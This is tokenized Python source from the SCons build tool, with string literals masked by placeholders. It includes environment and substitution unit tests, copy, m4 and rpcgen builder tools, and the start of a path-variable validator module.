'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:source>' , <EOL> '<STR_LIT>' : '<STR_LIT:target>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> for x in self . reserved_variables : <EOL> assert not over . has_key ( x ) , over [ x ] <EOL> for x in added + [ '<STR_LIT>' ] : <EOL> assert over . has_key ( x ) , bad_msg % x <EOL> def test_parse_flags ( self ) : <EOL> '''<STR_LIT>''' <EOL> env = Environment ( tools = [ ] , parse_flags = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> env = Environment ( tools = [ ] , CCFLAGS = None , parse_flags = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> env = Environment ( tools = [ ] , CPPDEFINES = '<STR_LIT>' , parse_flags = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> def test_clone_parse_flags ( self ) : <EOL> '''<STR_LIT>''' <EOL> env = Environment ( tools = [ ] ) <EOL> env2 = env . Clone ( parse_flags = '<STR_LIT>' ) <EOL> assert not env . has_key ( '<STR_LIT>' ) <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> env = Environment ( tools = [ ] , CCFLAGS = None ) <EOL> env2 = env . Clone ( parse_flags = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] is None , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> env = Environment ( tools = [ ] , CPPDEFINES = '<STR_LIT>' ) <EOL> env2 = env . Clone ( parse_flags = '<STR_LIT>' ) <EOL> assert not env . has_key ( '<STR_LIT>' ) <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> assert not env . has_key ( '<STR_LIT>' ) <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> class OverrideEnvironmentTestCase ( unittest . TestCase , TestEnvironmentFixture ) : <EOL> def setUp ( self ) : <EOL> env = Environment ( ) <EOL> env . _dict = { '<STR_LIT>' : '<STR_LIT:x>' , '<STR_LIT>' : '<STR_LIT:y>' } <EOL> env2 = OverrideEnvironment ( env , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> env3 = OverrideEnvironment ( env2 , { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . envs = [ env , env2 , env3 ] <EOL> def checkpath ( self , node , expect ) : <EOL> return str ( node ) == os . path . normpath ( expect ) <EOL> def test___init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == '<STR_LIT>' , env2 [ '<STR_LIT>' ] <EOL> assert env3 [ '<STR_LIT>' ] == '<STR_LIT>' , env3 [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:y>' , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == '<STR_LIT:y>' , env2 [ '<STR_LIT>' ] <EOL> assert env3 [ '<STR_LIT>' ] == '<STR_LIT>' , env3 [ '<STR_LIT>' ] <EOL> def test___delitem__ ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> del env3 [ '<STR_LIT>' ] <EOL> assert not env . has_key ( '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert not env2 . has_key ( '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert not env3 . has_key ( '<STR_LIT>' ) , "<STR_LIT>" <EOL> del env3 [ '<STR_LIT>' ] <EOL> assert not env . has_key ( '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert not env2 . has_key ( '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert not env3 . has_key ( '<STR_LIT>' ) , "<STR_LIT>" <EOL> del env3 [ '<STR_LIT>' ] <EOL> assert not env . has_key ( '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert not env2 . has_key ( '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert not env3 . has_key ( '<STR_LIT>' ) , "<STR_LIT>" <EOL> def test_get ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> assert env . get ( '<STR_LIT>' ) == '<STR_LIT:x>' , env . get ( '<STR_LIT>' ) <EOL> assert env2 . get ( '<STR_LIT>' ) == '<STR_LIT>' , env2 . get ( '<STR_LIT>' ) <EOL> assert env3 . get ( '<STR_LIT>' ) == '<STR_LIT>' , env3 . get ( '<STR_LIT>' ) <EOL> assert env . get ( '<STR_LIT>' ) == '<STR_LIT:y>' , env . get ( '<STR_LIT>' ) <EOL> assert env2 . get ( '<STR_LIT>' ) == '<STR_LIT:y>' , env2 . get ( '<STR_LIT>' ) <EOL> assert env3 . get ( '<STR_LIT>' ) == '<STR_LIT>' , env3 . get ( '<STR_LIT>' ) <EOL> assert env . get ( '<STR_LIT>' ) == None , env . get ( '<STR_LIT>' ) <EOL> assert env2 . get ( '<STR_LIT>' ) == None , env2 . get ( '<STR_LIT>' ) <EOL> assert env3 . get ( '<STR_LIT>' ) == '<STR_LIT>' , env3 . get ( '<STR_LIT>' ) <EOL> def test_has_key ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> assert env . has_key ( '<STR_LIT>' ) , env . has_key ( '<STR_LIT>' ) <EOL> assert env2 . has_key ( '<STR_LIT>' ) , env2 . has_key ( '<STR_LIT>' ) <EOL> assert env3 . has_key ( '<STR_LIT>' ) , env3 . has_key ( '<STR_LIT>' ) <EOL> assert env . has_key ( '<STR_LIT>' ) , env . has_key ( '<STR_LIT>' ) <EOL> assert env2 . has_key ( '<STR_LIT>' ) , env2 . has_key ( '<STR_LIT>' ) <EOL> assert env3 . has_key ( '<STR_LIT>' ) , env3 . has_key ( '<STR_LIT>' ) <EOL> assert not env . has_key ( '<STR_LIT>' ) , env . has_key ( '<STR_LIT>' ) <EOL> assert not env2 . has_key ( '<STR_LIT>' ) , env2 . has_key ( '<STR_LIT>' ) <EOL> assert env3 . has_key ( '<STR_LIT>' ) , env3 . has_key ( '<STR_LIT>' ) <EOL> def test_contains ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> '<STR_LIT:x>' in { '<STR_LIT:x>' : <NUM_LIT:1> } <EOL> except TypeError : <EOL> pass <EOL> else : <EOL> env , env2 , env3 = self . envs <EOL> assert '<STR_LIT>' in env <EOL> assert '<STR_LIT>' in env2 <EOL> assert '<STR_LIT>' in env3 <EOL> assert '<STR_LIT>' in env <EOL> assert '<STR_LIT>' in env2 <EOL> assert '<STR_LIT>' in env3 <EOL> assert not '<STR_LIT>' in env <EOL> assert not '<STR_LIT>' in env2 <EOL> assert '<STR_LIT>' in env3 <EOL> def test_items ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> items = env . Dictionary ( ) <EOL> assert items == { '<STR_LIT>' : '<STR_LIT:x>' , '<STR_LIT>' : '<STR_LIT:y>' } , items <EOL> items = env2 . Dictionary ( ) <EOL> assert items == { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:y>' } , items <EOL> items = env3 . Dictionary ( ) <EOL> assert items == { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , items <EOL> def test_items ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> items = env . items ( ) <EOL> items . sort ( ) <EOL> assert items == [ ( '<STR_LIT>' , '<STR_LIT:x>' ) , ( '<STR_LIT>' , '<STR_LIT:y>' ) ] , items <EOL> items = env2 . items ( ) <EOL> items . sort ( ) <EOL> assert items == [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT:y>' ) ] , items <EOL> items = env3 . items ( ) <EOL> items . sort ( ) <EOL> assert items == [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] , items <EOL> def test_gvars ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> gvars = env . gvars ( ) <EOL> assert gvars == { '<STR_LIT>' : '<STR_LIT:x>' , '<STR_LIT>' : '<STR_LIT:y>' } , gvars <EOL> gvars = env2 . gvars ( ) <EOL> assert gvars == { '<STR_LIT>' : '<STR_LIT:x>' , '<STR_LIT>' : '<STR_LIT:y>' } , gvars <EOL> gvars = env3 . gvars ( ) <EOL> assert gvars == { '<STR_LIT>' : '<STR_LIT:x>' , '<STR_LIT>' : '<STR_LIT:y>' } , gvars <EOL> def test_lvars ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> lvars = env . lvars ( ) <EOL> assert lvars == { } , lvars <EOL> lvars = env2 . lvars ( ) <EOL> assert lvars == { '<STR_LIT>' : '<STR_LIT>' } , lvars <EOL> lvars = env3 . lvars ( ) <EOL> assert lvars == { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , lvars <EOL> def test_Replace ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == '<STR_LIT>' , env2 [ '<STR_LIT>' ] <EOL> assert env3 [ '<STR_LIT>' ] == '<STR_LIT>' , env3 [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:y>' , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == '<STR_LIT:y>' , env2 [ '<STR_LIT>' ] <EOL> assert env3 [ '<STR_LIT>' ] == '<STR_LIT>' , env3 [ '<STR_LIT>' ] <EOL> env . Replace ( YYY = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == '<STR_LIT>' , env2 [ '<STR_LIT>' ] <EOL> assert env3 [ '<STR_LIT>' ] == '<STR_LIT>' , env3 [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == '<STR_LIT>' , env2 [ '<STR_LIT>' ] <EOL> assert env3 [ '<STR_LIT>' ] == '<STR_LIT>' , env3 [ '<STR_LIT>' ] <EOL> def test_FindIxes ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> x = env . FindIxes ( [ '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = env2 . FindIxes ( [ '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = env3 . FindIxes ( [ '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> def test_ReplaceIxes ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> x = env . ReplaceIxes ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = env2 . ReplaceIxes ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = env3 . ReplaceIxes ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> def test_Dir ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> x = env . Dir ( '<STR_LIT>' ) <EOL> assert self . checkpath ( x , '<STR_LIT>' ) , str ( x ) <EOL> x = env2 . Dir ( '<STR_LIT>' ) <EOL> assert self . checkpath ( x , '<STR_LIT>' ) , str ( x ) <EOL> x = env3 . Dir ( '<STR_LIT>' ) <EOL> assert self . checkpath ( x , '<STR_LIT>' ) , str ( x ) <EOL> def test_Entry ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> x = env . Entry ( '<STR_LIT>' ) <EOL> assert self . checkpath ( x , '<STR_LIT>' ) , str ( x ) <EOL> x = env2 . Entry ( '<STR_LIT>' ) <EOL> assert self . checkpath ( x , '<STR_LIT>' ) , str ( x ) <EOL> x = env3 . Entry ( '<STR_LIT>' ) <EOL> assert self . checkpath ( x , '<STR_LIT>' ) , str ( x ) <EOL> def test_File ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> x = env . File ( '<STR_LIT>' ) <EOL> assert self . checkpath ( x , '<STR_LIT>' ) , str ( x ) <EOL> x = env2 . File ( '<STR_LIT>' ) <EOL> assert self . checkpath ( x , '<STR_LIT>' ) , str ( x ) <EOL> x = env3 . File ( '<STR_LIT>' ) <EOL> assert self . checkpath ( x , '<STR_LIT>' ) , str ( x ) <EOL> def test_Split ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> env [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> x = env . Split ( '<STR_LIT>' ) <EOL> assert x == [ '<STR_LIT:x>' , '<STR_LIT:y>' ] , x <EOL> x = env2 . Split ( '<STR_LIT>' ) <EOL> assert x == [ '<STR_LIT>' , '<STR_LIT:y>' ] , x <EOL> x = env3 . Split ( '<STR_LIT>' ) <EOL> assert x == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , x <EOL> def test_parse_flags ( self ) : <EOL> '''<STR_LIT>''' <EOL> env = SubstitutionEnvironment ( ) <EOL> env2 = env . Override ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert not env . has_key ( '<STR_LIT>' ) <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> env = SubstitutionEnvironment ( CCFLAGS = None ) <EOL> env2 = env . Override ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert env [ '<STR_LIT>' ] is None , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> env = SubstitutionEnvironment ( CPPDEFINES = '<STR_LIT>' ) <EOL> env2 = env . Override ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert not env . has_key ( '<STR_LIT>' ) <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> assert not env . has_key ( '<STR_LIT>' ) <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> class NoSubstitutionProxyTestCase ( unittest . TestCase , TestEnvironmentFixture ) : <EOL> def test___init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:y>' , env [ '<STR_LIT>' ] <EOL> proxy = NoSubstitutionProxy ( env ) <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:x>' , proxy [ '<STR_LIT>' ] <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:y>' , proxy [ '<STR_LIT>' ] <EOL> def test_attributes ( self ) : <EOL> """<STR_LIT>""" <EOL> env = Environment ( ) <EOL> setattr ( env , '<STR_LIT>' , '<STR_LIT>' ) <EOL> proxy = NoSubstitutionProxy ( env ) <EOL> setattr ( proxy , '<STR_LIT>' , '<STR_LIT>' ) <EOL> x = getattr ( env , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = getattr ( proxy , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = getattr ( env , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = getattr ( proxy , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> def test_subst ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:y>' , env [ '<STR_LIT>' ] <EOL> proxy = NoSubstitutionProxy ( env ) <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:x>' , proxy [ '<STR_LIT>' ] <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:y>' , proxy [ '<STR_LIT>' ] <EOL> x = env . subst ( '<STR_LIT>' ) <EOL> assert x == '<STR_LIT:x>' , x <EOL> x = proxy . subst ( '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = proxy . subst ( '<STR_LIT>' , raw = <NUM_LIT:7> , target = None , source = None , <EOL> conv = None , <EOL> extra_meaningless_keyword_argument = None ) <EOL> assert x == '<STR_LIT>' , x <EOL> def test_subst_kw ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:y>' , env [ '<STR_LIT>' ] <EOL> proxy = NoSubstitutionProxy ( env ) <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:x>' , proxy [ '<STR_LIT>' ] <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:y>' , proxy [ '<STR_LIT>' ] <EOL> x = env . subst_kw ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert x == { '<STR_LIT:x>' : '<STR_LIT:y>' } , x <EOL> x = proxy . subst_kw ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert x == { '<STR_LIT>' : '<STR_LIT>' } , x <EOL> def test_subst_list ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:y>' , env [ '<STR_LIT>' ] <EOL> proxy = NoSubstitutionProxy ( env ) <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:x>' , proxy [ '<STR_LIT>' ] <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:y>' , proxy [ '<STR_LIT>' ] <EOL> x = env . subst_list ( '<STR_LIT>' ) <EOL> assert x == [ [ '<STR_LIT:x>' ] ] , x <EOL> x = proxy . subst_list ( '<STR_LIT>' ) <EOL> assert x == [ [ ] ] , x <EOL> x = proxy . subst_list ( '<STR_LIT>' , raw = <NUM_LIT:0> , target = None , source = None , conv = None ) <EOL> assert x == [ [ ] ] , x <EOL> def test_subst_target_source ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:y>' , env [ '<STR_LIT>' ] <EOL> proxy = NoSubstitutionProxy ( env ) <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:x>' , proxy [ '<STR_LIT>' ] <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:y>' , proxy [ '<STR_LIT>' ] <EOL> args = ( '<STR_LIT>' , ) <EOL> kw = { '<STR_LIT:target>' : DummyNode ( '<STR_LIT>' ) , '<STR_LIT:source>' : DummyNode ( '<STR_LIT>' ) } <EOL> x = apply ( env . subst_target_source , args , kw ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = apply ( proxy . subst_target_source , args , kw ) <EOL> assert x == '<STR_LIT>' , x <EOL> class EnvironmentVariableTestCase ( unittest . TestCase ) : <EOL> def test_is_valid_construction_var ( self ) : <EOL> """<STR_LIT>""" <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert not r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert not r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert not r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert not r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT:/>" ) <EOL> assert r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert r is None , r <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> suite = unittest . TestSuite ( ) <EOL> tclasses = [ SubstitutionTestCase , <EOL> BaseTestCase , <EOL> OverrideEnvironmentTestCase , <EOL> NoSubstitutionProxyTestCase , <EOL> EnvironmentVariableTestCase ] <EOL> for tclass in tclasses : <EOL> names = unittest . getTestCaseNames ( tclass , '<STR_LIT>' ) <EOL> suite . addTests ( map ( tclass , names ) ) <EOL> if not unittest . TextTestRunner ( ) . run ( suite ) . wasSuccessful ( ) : <EOL> sys . exit ( <NUM_LIT:1> ) </s>
<s> """<STR_LIT>""" <EOL> __revision__ = "<STR_LIT>" <EOL> import SCons <EOL> from SCons . Tool . install import copyFunc <EOL> copyToBuilder , copyAsBuilder = None , None <EOL> def copyto_emitter ( target , source , env ) : <EOL> """<STR_LIT>""" <EOL> n_target = [ ] <EOL> for t in target : <EOL> n_target = n_target + map ( lambda s , t = t : t . File ( str ( s ) ) , source ) <EOL> return ( n_target , source ) <EOL> def copy_action_func ( target , source , env ) : <EOL> assert ( len ( target ) == len ( source ) ) , "<STR_LIT>" % ( map ( str , target ) , map ( str , source ) ) <EOL> for t , s in zip ( target , source ) : <EOL> if copyFunc ( t . get_path ( ) , s . get_path ( ) , env ) : <EOL> return <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> def copy_action_str ( target , source , env ) : <EOL> return env . subst_target_source ( env [ '<STR_LIT>' ] , <NUM_LIT:0> , target , source ) <EOL> copy_action = SCons . Action . Action ( copy_action_func , copy_action_str ) <EOL> def generate ( env ) : <EOL> try : <EOL> env [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> env [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> except KeyError , e : <EOL> global copyToBuilder <EOL> if copyToBuilder is None : <EOL> copyToBuilder = SCons . Builder . Builder ( <EOL> action = copy_action , <EOL> target_factory = env . fs . Dir , <EOL> source_factory = env . fs . Entry , <EOL> multi = <NUM_LIT:1> , <EOL> emitter = [ copyto_emitter , ] ) <EOL> global copyAsBuilder <EOL> if copyAsBuilder is None : <EOL> copyAsBuilder = SCons . Builder . Builder ( <EOL> action = copy_action , <EOL> target_factory = env . fs . Entry , <EOL> source_factory = env . fs . Entry ) <EOL> env [ '<STR_LIT>' ] [ '<STR_LIT>' ] = copyToBuilder <EOL> env [ '<STR_LIT>' ] [ '<STR_LIT>' ] = copyAsBuilder <EOL> env [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> def exists ( env ) : <EOL> return <NUM_LIT:1> </s>
<s> """<STR_LIT>""" <EOL> __revision__ = "<STR_LIT>" <EOL> import SCons . Action <EOL> import SCons . Builder <EOL> import SCons . Util <EOL> def generate ( env ) : <EOL> """<STR_LIT>""" <EOL> M4Action = SCons . Action . Action ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> bld = SCons . Builder . Builder ( action = M4Action , src_suffix = '<STR_LIT>' ) <EOL> env [ '<STR_LIT>' ] [ '<STR_LIT>' ] = bld <EOL> env [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> env [ '<STR_LIT>' ] = SCons . Util . CLVar ( '<STR_LIT>' ) <EOL> env [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> def exists ( env ) : <EOL> return env . Detect ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> __revision__ = "<STR_LIT>" <EOL> from SCons . Builder import Builder <EOL> import SCons . Util <EOL> cmd = "<STR_LIT>" <EOL> rpcgen_client = cmd % ( '<STR_LIT:l>' , '<STR_LIT>' ) <EOL> rpcgen_header = cmd % ( '<STR_LIT:h>' , '<STR_LIT>' ) <EOL> rpcgen_service = cmd % ( '<STR_LIT:m>' , '<STR_LIT>' ) <EOL> rpcgen_xdr = cmd % ( '<STR_LIT:c>' , '<STR_LIT>' ) <EOL> def generate ( env ) : <EOL> "<STR_LIT>" <EOL> client = Builder ( action = rpcgen_client , suffix = '<STR_LIT>' , src_suffix = '<STR_LIT>' ) <EOL> header = Builder ( action = rpcgen_header , suffix = '<STR_LIT>' , src_suffix = '<STR_LIT>' ) <EOL> service = Builder ( action = rpcgen_service , suffix = '<STR_LIT>' , src_suffix = '<STR_LIT>' ) <EOL> xdr = Builder ( action = rpcgen_xdr , suffix = '<STR_LIT>' , src_suffix = '<STR_LIT>' ) <EOL> env . Append ( BUILDERS = { '<STR_LIT>' : client , <EOL> '<STR_LIT>' : header , <EOL> '<STR_LIT>' : service , <EOL> '<STR_LIT>' : xdr } ) <EOL> env [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> env [ '<STR_LIT>' ] = SCons . Util . CLVar ( '<STR_LIT>' ) <EOL> env [ '<STR_LIT>' ] = SCons . Util . CLVar ( '<STR_LIT>' ) <EOL> env [ '<STR_LIT>' ] = SCons . Util . CLVar ( '<STR_LIT>' ) <EOL> env [ '<STR_LIT>' ] = SCons . Util . CLVar ( '<STR_LIT>' ) <EOL> env [ '<STR_LIT>' ] = SCons . Util . CLVar ( '<STR_LIT>' ) <EOL> def exists ( env ) : <EOL> return env . Detect ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> __revision__ = "<STR_LIT>" <EOL> __all__ = [ '<STR_LIT>' , ] <EOL> import os <EOL> import os . path <EOL> import SCons . Errors <EOL> class _PathVariableClass : <EOL> def PathAccept ( self , key , val , env ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def PathIsDir ( self , key , val , env ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . isdir ( val ) : <EOL> if os . path . isfile ( val ) : <EOL> m = '<STR_LIT>' <EOL> else : <EOL> m = '<STR_LIT>' <EOL> raise SCons . Errors . UserError ( m % ( key , val ) ) <EOL> def PathIsDirCreate ( self , key , val , env ) : <EOL> """<STR_LIT>""" <EOL> if os . path . isfile ( val ) : <EOL> m = '<STR_LIT>' <EOL> raise SCons . Errors . UserError ( m % ( key , val ) ) <EOL> if not os . path . isdir ( val ) : <EOL> os . makedirs ( val ) <EOL> def PathIsFile ( self , key , val , env ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . isfile ( val ) : <EOL> if os . path . isdir ( val ) : <EOL> m = '<STR_LIT>' <EOL> else : <EOL> m = '<STR_LIT>' <EOL> raise SCons . Errors . UserError ( m % ( key , val ) ) <EOL> def PathExists ( self , key , val , env ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . exists ( val ) : <EOL> m = '<STR_LIT>' <EOL> raise SCons . Errors . UserError ( m % ( key , val ) ) <EOL> def __call__ ( self , key , help , default , validator = None ) : <EOL> """<STR_LIT>""" 